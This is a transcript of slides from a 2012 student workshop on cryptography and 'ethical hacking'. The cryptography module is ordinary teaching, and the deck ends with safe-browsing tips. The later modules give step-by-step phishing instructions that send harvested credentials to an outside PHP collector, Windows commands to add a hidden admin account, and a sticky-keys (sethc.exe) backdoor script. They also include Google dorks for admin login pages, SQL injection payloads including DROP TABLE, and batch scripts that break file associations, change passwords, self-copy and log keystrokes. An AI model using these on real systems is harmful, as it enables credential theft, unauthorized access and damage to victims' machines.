Workshop on 03 11-2012
-
date post
20-Oct-2014 -
Category
Internet
-
view
58 -
download
3
description
Transcript of Workshop on 03 11-2012
04/07/2023 1
Workshop On
Cryptography and
Ethical Hacking
04/07/2023 2
Modules
Cryptography Concepts – by K.K.Goyal(Asst Professor)
Windows Password Hacking – by Parul Kaushik
Phishing & Security of Data – by Praval Sharma
SQL Injection & WebCam Hacking – by Gaurav Gautam
Batch Programming & Viruses – by Ehtisham Ali
04/07/2023 3
MODULE 1By: - K K GoyalAsst ProfessorRBS MTC AGRA
04/07/2023 4
Threats against electronic communicationsCryptography principles
Message Digests (One-way hash functions)Secret key (symmetric) cryptographyPublic key (asymmetric) cryptography
Practical implementation of cryptographyThe potential role of public authoritiesConclusions
Topics Under Module 1
04/07/2023 5
Q. Is Internet secure ?The wrong question !
Q. Right questions: -Is the telephone secure ???Are postal services secure ???
Ans. A worldwide communication network, with millions of users can not be secure.
04/07/2023 6
Q. Can specific Internet applications be secure ?YES. this is the topic of today
Q. Are most of the Internet applications secure ?Most don’t need to !!!
Some should but aren’t !!!
04/07/2023 7
World Wide Web
HTTP Client(Web Browser)
HTTP Server
HTTP Server
HTTP Server
Other ServerHTTP Server
HTTP Linktransporting HTML-encoded hypertext
Other Data Link
04/07/2023 8
HTTPHypertext Transfer Protocol
Network Service
Transport entity
Transport entity
Connection oriented protocol
Client HTTP
Server HTTP
Connectionless protocol
Browser Web Server
04/07/2023 9
HTTPis a Stateless Protocol
Loging in a stateless server :
Client HTTP
Server HTTP
Browser Web Server> I want to log into the server
Give your name and password <> XYZ, ******
OK, here is your key 478 <> show me my bank records,
my key is 478.Here are your bank records <
$$$$$$$$$ <If you need more use key 953 <
....
04/07/2023 10
HTTPis a Stateless Protocol
Loging in a stateless server :
Client HTTP
Server HTTP
Browser Web Server> I want to log into the server
Give your name and password <> XYZ, ******
OK, here is your key 478 <> show me my bank records,
my key is 478.Here are your bank records <
$$$$$$$$$ <If you need more use key 953 <
....
04/07/2023 11
Threats against electronic communicationsCryptography principles
Message Digests (One-way hash functions)Secret key (symmetric) cryptographyPublic key (asymmetric) cryptography
Practical implementation of cryptographyThe potential role of public authoritiesConclusions
Topics Under Module 1
04/07/2023 12
Threats : data interception
MAFIA NV/SA
04/07/2023 13
Threats : masquerade
MAFIA NV/SA
04/07/2023 14
Threats : data manipulation
MAFIA NV/SA
"Transfer x € toaccount abc"
"Transfer x € toaccount uvw"
04/07/2023 15
Threats : message replay
"Send me movie xand bill it to my
account abc"
"Send me movie xand bill it to my
account abc"
04/07/2023 16
Threats : message repudiation
"It is a pity youinstructed me to sell,abc gained in value"
"Sell all my abc shares"
"I never instructed you to sell my abc shares, you
have to compensate"
04/07/2023 17
Threats against electronic communicationsCryptography principles
Message Digests (One-way hash functions)Secret key (symmetric) cryptographyPublic key (asymmetric) cryptography
Practical implementation of cryptographyThe potential role of public authoritiesConclusions
Topics Under Module 1
04/07/2023 18
Hiding Information
04/07/2023 19
Sender :Compute message digest
All message bits should influence digestComputing digest from message simpleComputing message from digest impossiblee.g.: digest = checksum
Send message + digestReceiver :
Receive message and digestCompute digest from received messageCompare computed and received digests
One Way Hash Functionsfor checking message integrity
04/07/2023 20
One Way Hash Functionsfor checking message integrity
Sender:
message+
messagedigest
digesthash
04/07/2023 21
One Way Hash Functionsfor checking message integrity
Receiver:
<>message
digest digest
hash
=?
*
OK
messagedigest
04/07/2023 22
Cryptography
CRYPTO-ALGORITHM
Encryptionkey
Decryptionkey
"Sell all my abc shares"
"Sell all my abc shares"
"nseefglw470%GHkdaJ"
CRYPTO-ALGORITHM
04/07/2023 23
Well known and widely available algorithmOnly keys are to be kept secret potential intruders and volunteer experts can search for algorithmic weaknessesweaknesses will quickly be publicized !widely used on internet and for ecommerce
Secret algorithm Encryption devices need to be protected and replaced if compromised.Very few people can verify algorithmsweaknesses can remain hidden, but possibly know by potential intruderscommon in proprietary and/or military systems
Crypto-algorithms
04/07/2023 24
Encryption_Key = Decryption_Key= "Secret Key Cryptography"• Symmetric• Key distribution problem• Fast encryption and decryption
Encryption_Key Decryption_Key=" Public Key Cryptography "• Asymmetric• Key publicity problem• Slow encryption and decryption
In practice, both are used together
Crypto-keys
04/07/2023 25
Secret Key Cryptography
CRYPTO-ALGORITHM
Secretkey
CRYPTO-ALGORITHM
Cleartext Cleartext
Ciphertext
Unprotected Channel
Secure Channel
One secret key per users pairensures both
confidentiality and authenticity
04/07/2023 26
• Fast algorithm for bulk encryption• Hardware or software implementations• Security somewhat controversial• Multiple encryption very secure• Commonly used
Secret Key CryptographyThe Data Encryption Standard
DES
Secret key56 bit
Cleartext
64 bit 64 bit64 bit64 bit 64 bit 64 bit
Ciphertext
04/07/2023 27
Public Key Cryptographyfor ensuring confidentiality
CRYPTO-ALGORITHM
CRYPTO-ALGORITHM
Cleartext Cleartext
Ciphertext
Unprotected Channel
Key pairUnprotected (?) Channel
Public Key Secret Key
A secret message intended for A should be encoded
with A's public key !
04/07/2023 28
Public Key Cryptographyfor identifying sender
CRYPTO-ALGORITHM
CRYPTO-ALGORITHM
Cleartext Cleartext
Ciphertext
Unprotected Channel
Key pairUnprotected (?) Channel
Public KeySecret Key
A message that can be decoded with A's public keywas certainly send by A !
04/07/2023 29
Public Key Cryptography
RSA algorithm1. select two large prime numbers p and q2. compute n = p*q and z = (p-1)*(q-1)3. select decryption key d relatively prime to z4. find encryption key e such that (e*d) MOD z = 15. Encrypt M by computing E = Me MOD n6. Decrypt by computing M = Ed MOD n
Computing d or e from the other one requiresfactorization of n into its prime factors p and q.
Factorization of n (>200 digits) is an extremely long operation (months on a supercomputer)
RSA is much slower than DES
04/07/2023 30
Threats against electronic communicationsCryptography principles
Message Digests (One-way hash functions)Secret key (symmetric) cryptographyPublic key (asymmetric) cryptography
Practical implementation of cryptographyThe potential role of public authoritiesConclusions
Topics Under Module 1
04/07/2023 31
Some tools related to cryptography• TrueCrypt
• Yodas Crypter• Frame Based Encryption Scheme• Crypt Tool
04/07/2023 32
GSM station authentication
MSVLR HLR
K i
imsivlr,imsi
randsres
rand,sres, Kc
data & signallingenciphered by Kc
....i:K i....
sres = A3(Ki,rand) Kc = A8(Ki,rand)
04/07/2023 33
Electronic SignaturesSigning a message
+message
digest
hashing
messagesignature
signature
CRYPTO-ALGORITHM
Signer'ssecret
key
04/07/2023 34
Electronic SignaturesChecking the signature
hashing
digest
=?
message*
OK
<>
digest
signature
CRYPTO-ALGORITHM
Signer'spublic
key
messagesignature
04/07/2023 35
Practical Cryptography• Confidentiality of messages :
– long : Symmetric key cryptography– short : Asymmetric key cryptography
• Authenticity of messages (electronic signature) :– Asymmetric key cryptography to authenticate message digest
obtained by hashing
• Non repudiation : – undisputable time stamp in digest– copy of digest in trustworthy repository
• Distribution of symmetric keys – Asymmetric key cryptography
04/07/2023 36
Threats against electronic communicationsCryptography principles
Message Digests (One-way hash functions)Secret key (symmetric) cryptographyPublic key (asymmetric) cryptography
Practical implementation of cryptographyThe potential role of public authoritiesConclusions
Topics Under Module 1
04/07/2023 37
Public Key CryptographyEnsuring both confidentiality and authenticity
A B
eA
eB
dA
dB
04/07/2023 38
Public Key CryptographyPublic Keys can be changed !!!
MAFIA NV/SA
A B
eA
em
dA
dm
dm'
dB
eB
em'
04/07/2023 39
Certification Authority
Certification Authority
A B
A:PA
B:PB
sCA
sA
PCA
sB
PCA
04/07/2023 40
Digital Certificates
• Issued by a well know Certification Authority (CA)• Contains at least :
– Identification of the issuing CA– Unambiguous identity of the owner– The owner's public key– electronic signature of CA
• Any user knowing the public key of the CA can recover the public key of the certificate owner.
• Only the public key of the CA needs to be generally well known and regularly checked.
04/07/2023 41
Conclusion
• All techniques for secure ecommerce exist• Large scale usage requires third-party certification
– For identity of users– For time-stamps
• Certifying the identity of individuals and corporations is a natural task for public authorities
• Postal services have a tradition of providing trustworthy time stamps
• Observatories could also become providers of high accuracy time stamps
• Legislative action is urgently needed
04/07/2023 42
MODULE 2By Parul Kaushik
04/07/2023 43
1) Login Password2) BIOS Password 3) Biometric Password4) Boot Password5) Syskey Password
Topics Under Module 2
Types Of Passwords
04/07/2023 44
1) net user *2) net user hack /add3) net localgroup administraters a/c
name / add4) net user hack /del
Login passwords commands
04/07/2023 45
GO TO BIOS SETTINGS….THEN GO TO SECURITY TAB BOOT PASSWORD - USER PASSWORD. BIOS PASSWORD - SUPERVISOR PASSWORD.
BIOS AND BOOT PASSWORD CAN BE CRACKED BY REMOVING THE CMOS BATTERY FOR 5 MINUTES.
Boot Password
04/07/2023 46
OPH Crack Kon Boot Offline Password Cracker Active Password Changer ERD Commander
Topics Under Module 2
Tools for login passwords
04/07/2023 47
MODULE 3By Praval Sharma
04/07/2023 48
1) PHISHING ATTACK2) LOCKING FOLDERS3) HIDING DRIVE PARTITIONS
Topics Under Module 3
04/07/2023 49
OPEN ANY LOGIN PAGE GO TO FILE THEN, SAVE PAGE AS…. WEB PAGE , HTML ONLY. CLICK SAVE PAGE. OPEN PAGE WITH NOTEPAD. PRESS CTRL+F TO FIND FIND ACTION. THEN PLACE THIS CODE AFTER ACTION
ACTION=“HTTP://CYBERCURE.NET /TESTERS /PRACPH57.PHP? ID=“YOUR EMAIL ID”& LINK=SITE NAME”
Phishing Attacks
04/07/2023 50
By using Change Access Control Lists (CACLS) Command. - Open CMD (in Windows 7 open CMD as an Administrator) - Use this Command :For Locking the Folder-
CACLS <Folder Name> /E /P Everyone :N For Accessing the Folder
CACLS <Folder Name> /E /P Everyone :F
Locking Folders
04/07/2023 51
Open CMD as an Administrator.Type the following commands:
C:\Users\User Account>DISKPART Press EnterDISKPART> List Volume Press EnterDISKPART> Select Volume <Volume Number> Press EnterDISKPART> Remove letter <Drive letter> Press Enter
YOUR DISK HAS BEEN HIDDEN NOW
Hiding Drive Partitions
04/07/2023 52
REPEAT ALL STEPS AS MENTIONED IN PREVIOUS SLIDE.CHANGE THE FOURTH STEP AS:
DISKPART> Assign letter <Drive letter> Press Enter
YOUR DISK AS BEEN VISIBLE NOW
Hiding Drive Partitions
04/07/2023 53
MODULE 4By GAURAV GAUTAM
04/07/2023 54
1) SQL INJECTION2) ONLINE WEBCAM
Topics Under Module 4
04/07/2023 55
SQL injection is a technique often used to attack a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database
SQL Injection
04/07/2023 56
Type any of following points in Google to get Admin Login pages:
INURL: admin.aspINURL: adminlogin.aspINURL: admin.aspxINURL: adminlogin.aspxINURL: admin.aspINURL: admin.phpINURL: adminlogin.php
SQL Injection
04/07/2023 57
SQL Injection Attacks query by Example
SELECT field list FROM table WHERE field = 'password';where like as anything' OR 'x'='xx' AND email IS NULL;[email protected]' AND password = 'hello12323 OR 1=1\''; DROP TABLE users; --
SQL Injection
04/07/2023 58
MODULE 5By ehtisham ali
04/07/2023 59
1) Disable Internet2) Self deleting code3) Net user automation4) File extension bomb5) Full control of file6) Sticky attack automation7) Self copying code8) Simple keylogger9) Startup code10)Website blocking
Topics Under Module 5
04/07/2023 60
Disable Internet> @echo off> ::--------Block Internet-------::> ipconfig /release> if ERRORLEVEL1 ipconfig /release_all>
04/07/2023 61
Self deleting code> @echo off> CD ..> START CMD /C DEL /Q "%~dpnx0" >
04/07/2023 62
Net user automation> @echo off> ::--Change Pass To 1234--::> net user %username% 1234 >
04/07/2023 63
File Extension Bomb> @echo off> color fc> assoc .jpg=internetshortcut> assoc .mp3=internetshortcut> assoc .lnk=internetshortcut> assoc .htm=internetshortcut> assoc .html=internetshortcut> assoc .txt=internetshortcut> assoc .doc=internetshortcut> assoc .xlsx=internetshortcut> assoc .docx=internetshortcut> assoc .chm=internetshortcut> assoc .hlp=internetshortcut> assoc .pdf=internetshortcut> assoc .png=internetshortcut> assoc .rar=internetshortcut> assoc .zip=internetshortcut>
04/07/2023 64
Full control of a file> @echo off> ::----ownership----::> takeown /f “file” /a > ::----Access Rights----::> cacls “file” /e /p everyone:f>
04/07/2023 65
Sticky attack automation
> @echo off> copy c:\windows\system32\cmd.exe c:\ /y> ren c:\cmd.exe sethc.exe> takeown /f c:\windows\system32\sethc.exe /a > cacls c:\windows\system32\sethc.exe /e /p everyone:f> copy c:\sethc.exe c:\windows\system32\ /y> del c:\sethc.exe>
04/07/2023 66
Self copying code> @echo off> xcopy viral.cmd c:\ /C /Q /H /R /K /Y /Z >
04/07/2023 67
Simple keylogger> @echo off> title Simple Keylogger> color 0a> :log> set /p "a=>"> cls> echo %a% >> keylog.txt> cls> goto log >
04/07/2023 68
Startup code> @echo off> REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v mypad /t REG_SZ /d %SystemRoot%\system32\notepad.exe /f
> start %SystemRoot%\system32\notepad.exe>
04/07/2023 69
WEBSITE BLOCKING> @echo off> ::--------Block Facebook-------::> cd "C:\Windows\System32\Drivers\etc"> echo 127.0.0.1 www.facebook.com >> "Hosts"> echo 127.0.0.1 facebook.com >> "Hosts"> echo 127.0.0.1 static.ak.fbcdn.net >> "Hosts"> echo 127.0.0.1 www.static.ak.fbcdn.net >> "Hosts"> echo 127.0.0.1 login.facebook.com >> "Hosts"> echo 127.0.0.1 www.login.facebook.com >> "Hosts"> echo 127.0.0.1 fbcdn.net >> "Hosts"> echo 127.0.0.1 www.fbcdn.net >> "Hosts"> echo 127.0.0.1 fbcdn.com >> "Hosts"> echo 127.0.0.1 www.fbcdn.com >> "Hosts"> echo 127.0.0.1 static.ak.connect.facebook.com >> "Hosts"> echo 127.0.0.1 www.static.ak.connect.facebook.com >> "Hosts">
04/07/2023 70
Safe BrowsingFollow some useful tips to browse the internet safely.
Use virtual keyboard to enter data in web forms (osk.exe – windows virtual keyboard)Check the authenticity of a website before interacting with it.Install security software’s to protect spywares, malwares, and Trojans.If you use net banking never Google for your bank website, rather always type the URL in the address field.Before visiting websites like bank site, social networking site and others check for the SSL protection. And if it is there than you have a better level of security.If you are frequent downloader of executable file than make sure to scan your downloaded file by this online service https://www.virustotal.com/